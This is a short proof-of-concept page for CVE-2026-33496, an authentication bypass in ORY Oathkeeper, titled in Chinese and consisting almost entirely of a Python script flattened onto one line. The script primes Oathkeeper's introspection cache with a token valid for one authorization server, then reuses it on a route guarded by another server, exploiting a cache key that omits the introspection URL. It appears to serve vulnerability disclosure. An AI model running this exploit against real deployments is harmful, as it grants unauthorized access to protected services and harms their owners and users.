CVE-2026-33496 ORY Oathkeeper认证绕过漏洞

# Conceptual PoC for CVE-2026-33496 import requests # Configuration target_url = "https://target-oathkeeper.com" introspection_endpoint_A = "https://auth-server-a.com/introspect" introspection_endpoint_B = "https://auth-server-b.com/introspect" valid_token_for_A = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." # Step 1: Prime the cache by sending a request authenticating against Server A # This causes Oathkeeper to cache the token as 'valid' for this specific token value headers = {"Authorization": f"Bearer {valid_token_for_A}"} print("[*] Priming cache with token valid for Server A...") response = requests.get(f"{target_url}/route-protected-by-A", headers=headers) print(f"Status: {response.status_code}") # Step 2: Exploit the cache confusion # Use the same token to access a route protected by Server B # Because the cache key does not include the Introspection URL, # Oathkeeper returns the cached result from Step 1, bypassing validation against Server B print("[*] Attempting to access route protected by Server B using the same token...") response = requests.get(f"{target_url}/route-protected-by-B", headers=headers) if response.status_code == 200: print("[!] Exploit successful! Authentication bypassed via cache confusion.") else: print("[-] Exploit failed.")